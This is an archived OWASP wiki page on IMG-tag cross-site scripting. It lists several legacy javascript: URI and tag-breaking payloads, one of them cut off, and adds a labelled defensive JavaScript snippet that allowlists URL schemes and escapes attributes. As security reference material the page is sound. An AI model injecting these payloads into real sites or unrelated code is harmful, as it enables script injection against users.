This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.

Script in IMG tags



An attacker can execute JavaScript through HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.


The following are methods an attacker can use to execute JavaScript; they will not be effective against modern browsers.

<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
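A defensive counterpart to the payloads above, as an added example that is not part of the original OWASP page: it allowlists the URL scheme of an IMG SRC value (case-insensitively) and always emits quoted, encoded attributes. The helper names (`isSafeImgSrc`, `escapeAttr`, `renderImg`) and the http/https allowlist are assumptions, and `src` is assumed to be the attribute value after HTML entity decoding.

```javascript
// Added example; helper names and the scheme allowlist are assumptions.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// True only for relative URLs or URLs whose scheme is allowlisted.
// `src` is assumed to be the attribute value after entity decoding.
function isSafeImgSrc(src) {
  if (typeof src !== "string") return false;
  // Normalise before reading the scheme: drop whitespace/control characters.
  const cleaned = src.replace(/[\u0000-\u0020\u007f]/g, "");
  if (cleaned === "") return false;
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (scheme) {
    // Case-insensitive compare, so "JaVaScRiPt:" is treated like "javascript:".
    return ALLOWED_SCHEMES.has(scheme[1].toLowerCase());
  }
  // No scheme: accept as relative only if it has no quote or markup characters.
  return !/[<>"'`]/.test(cleaned);
}

// Encode every character that can end an attribute value or open a tag.
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Build the tag with quoted, encoded attributes; null means "reject".
function renderImg(src, alt = "") {
  if (!isSafeImgSrc(src)) return null;
  return `<img src="${escapeAttr(src)}" alt="${escapeAttr(alt)}">`;
}

// Inputs: the first two are SRC values from the page, the rest are constructed.
const SAMPLES = [
  "javascript:alert('Vulnerable');",
  "JaVaScRiPt:alert('XSS')",
  "`javascript:alert(1)`",
  "https://example.com/logo.png",
  "images/logo.png",
];

function checkSamples() {
  return SAMPLES.map((s) => [s, isSafeImgSrc(s)]);
}

console.log(checkSamples());
```

Because the check is an allowlist, any scheme other than http or https is rejected by default rather than matched against a list of known-bad prefixes.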

Related Threats

Related Attacks

XSS Attacks

Related Vulnerabilities

Related Countermeasures

